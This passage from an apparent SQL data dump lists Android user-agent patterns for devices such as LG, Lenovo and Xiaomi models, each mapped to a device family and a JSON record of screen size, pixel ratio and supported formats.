Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X510.FG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X510WM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LML211BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LML212VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LML413DL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LML414DL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LML713DL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LND-AL30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LND-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LON-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LS032I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LT C2200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LUNA V57) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Land Rover Explore) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LeMoov) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LeMoov2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Le_Hola) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo K33a48) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo K520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo K53a48) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo K8 Note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo K8 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo K8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo L18021) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo L38011) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo L38012) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo L38041) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo L38043) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo L58041) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo L78011) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo TB-7104F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo TB-8504F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo TB-8504X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo TB-8704F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo TB-8704X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo TB-X104F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo TB-X304F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo TB-X304F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo TB-X304L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo TB-X304L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Lenovo TB-X605F) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Life 7S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Life Ace) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Life Compact 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Life Geo) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Life Play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Life Sky) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Like Hi5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LitePro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Luck) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; M11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":664,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; M2S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; M3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; M40A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; M5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; M520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; M531) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; M558) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; M580) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; M630) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; M700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":664,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; M9 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MAX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MAX_1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MHA-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MHA-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MI 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MI 5X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MI 5s Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":698,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MI 5s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MI 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MI 6X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MI 8 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MI 8 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":818,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MI 8 SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":816,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MI 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":817,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MI A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MI MAX 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MI MAX 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":785,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MI PAD 4 PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_xiaomi_mi','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MI PAD 4) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_xiaomi_mi','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MI PLAY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_xiaomi_mi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":830,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MITO_A37_Z1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mito','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; MIX 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":786,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 